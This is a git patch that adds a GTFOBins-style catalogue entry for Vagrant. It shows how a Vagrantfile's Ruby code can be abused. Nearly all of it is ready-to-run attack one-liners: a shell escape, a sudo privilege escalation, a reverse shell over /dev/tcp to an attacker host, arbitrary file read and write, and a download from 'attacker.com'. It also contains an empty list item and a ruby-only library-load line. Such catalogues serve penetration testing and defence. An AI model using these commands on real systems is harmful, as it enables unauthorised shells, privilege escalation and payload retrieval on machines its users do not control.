From e05b154647c59987188e61454ff75b98786005c0 Mon Sep 17 00:00:00 2001 From: PPong <102512960+ham45X13y@users.noreply.github.com> Date: Wed, 29 Mar 2023 18:34:57 +0200 Subject: [PATCH] Add vagrant.md --- _gtfobins/vagrant.md | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 _gtfobins/vagrant.md diff --git a/_gtfobins/vagrant.md b/_gtfobins/vagrant.md new file mode 100644 index 0000000..95de912 --- /dev/null +++ b/_gtfobins/vagrant.md @@ -0,0 +1,30 @@ +--- +description: | +Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed. +More Info at https://gtfobins.github.io/gtfobins/ruby/ +functions: + shell: + - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up + - + sudo: + - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up + reverse-shell: + - description: | + Run `nc -lvnp RPORT` on the attacker box. + Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell. + code: | + mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up + file-write: + - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up + file-read: + - code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up + library-load: + - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' + file-download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up +--- +